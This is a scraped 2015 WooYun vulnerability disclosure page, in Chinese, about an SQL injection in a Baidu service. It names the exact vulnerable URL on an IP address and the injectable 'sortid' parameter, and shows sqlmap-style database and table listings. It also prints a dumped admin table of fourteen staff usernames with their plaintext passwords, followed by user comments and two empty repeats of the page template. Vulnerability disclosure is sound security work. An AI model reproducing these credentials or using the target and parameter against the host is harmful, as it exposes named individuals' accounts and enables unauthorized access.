百度某业务sql注入(管理人员账号密码泄露)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116555

漏洞标题：百度某业务sql注入(管理人员账号密码泄露)

漏洞作者：杀器王子

提交时间：2015-05-27 18:28

修复时间：2015-07-11 19:00

公开时间：2015-07-11 19:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-27：细节已通知厂商并且等待厂商处理中
2015-05-27：厂商已经确认，细节仅向厂商公开
2015-06-06：细节向核心白帽子及相关领域专家公开
2015-06-16：细节向普通白帽子公开
2015-06-26：细节向实习白帽子公开
2015-07-11：细节向公众公开

简要描述：

详细说明：

http://42.62.39.206/wap/fl2/?mo=1&sortid=12&cm=M3140060&site=0
sortid参数

available databases [4]:
[*] baikan
[*] information_schema
[*] mysql
[*] test

漏洞证明：

Database: baikan
[21 tables]
+----------------------------+
| admin_user                 |
| baikan_psort               |
| baikan_saomiao_block_log   |
| baikan_saomiao_keyword_log |
| baikan_sort                |
| channel_bookorder_duoku    |
| channel_bookorder_duokubak |
| cmread_book_info           |
| global_level               |
| wap_advertisement          |
| wap_advertposition         |
| wap_block                  |
| wap_blockbooks             |
| wap_blockchildren          |
| wap_cooperater             |
| wap_cpbooks                |
| wap_feedback               |
| wap_keyword                |
| wap_keywordposition        |
| wap_page                   |
| wap_page_block             |
+----------------------------+

+------------------+-----------+
| uname            | password  |
+------------------+-----------+
| caiwu            | GAZfPh    |
| chenchi          | xyaXEq    |
| disanfang        | uaHFhK    |
| guojieming       | 123456    |
| guoyunjiao       | ftgA7I    |
| hejianqiu        | RVhzuS    |
| jiangwenjuan     | vYB2iS    |
| languiwei        | languiwei |
| liangyu          | AJ6GIZ    |
| liuyijiang       | c9NJ7a    |
| liyafei          | VeaP3K    |
| lougaohan        | han000    |
| qixin            | aPA8uw    |
| shangguanshunmin | 3826353   |

修复方案：

过滤

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-27 18:58

厂商回复：

感谢

漏洞评价：

2015-05-27 18:33 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

前排
2015-05-27 18:48 | Wulala ( 普通白帽子 | Rank:223 漏洞数:24 | ^..^ ^..^ ^↓^ ^..^ ^..^)

杀气太重
2015-05-27 18:59 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

牛B
2015-05-27 19:43 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

杀气太重
2015-05-27 20:40 | only_admin ( 路人 | Rank:11 漏洞数:5 | ~~~~我只是个孩子╭(°A°`)╮~~~~)

殺器在手，漏洞你有。。
2015-05-27 21:01 | 蜗牛也是牛 ( 路人 | Rank:5 漏洞数:1 | 黑客、红客、白客... 我只是一个看客！)

杀气太重
2015-05-27 21:24 | Sword ( 路人 | Rank:16 漏洞数:11 | 求大牛带飞)

杀气太重
2015-05-27 22:16 | 我爱水秀天蓝 ( 普通白帽子 | Rank:103 漏洞数:15 | 好好学习，天天向上！)

我怎么就不能这么NB呢？
2015-05-27 22:40 | 魔术师 ( 路人 | Rank:20 漏洞数:2 | 各种神器：http://www.codefrom.com/)

杀气太重，百度的sql注入啊！
2015-07-11 19:53 | 冷白开。 ( 普通白帽子 | Rank:128 漏洞数:53 | 萌哒哒的冷白开。QQ:970060225)

学习学习

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116555

漏洞标题：百度某业务sql注入(管理人员账号密码泄露)

相关厂商：百度

漏洞作者：杀器王子

提交时间：2015-05-27 18:28

修复时间：2015-07-11 19:00

公开时间：2015-07-11 19:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116555

漏洞标题：百度某业务sql注入(管理人员账号密码泄露)

相关厂商：百度

漏洞作者： 杀器王子

提交时间：2015-05-27 18:28

修复时间：2015-07-11 19:00

公开时间：2015-07-11 19:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116555"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：杀器王子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源杀器王子@乌云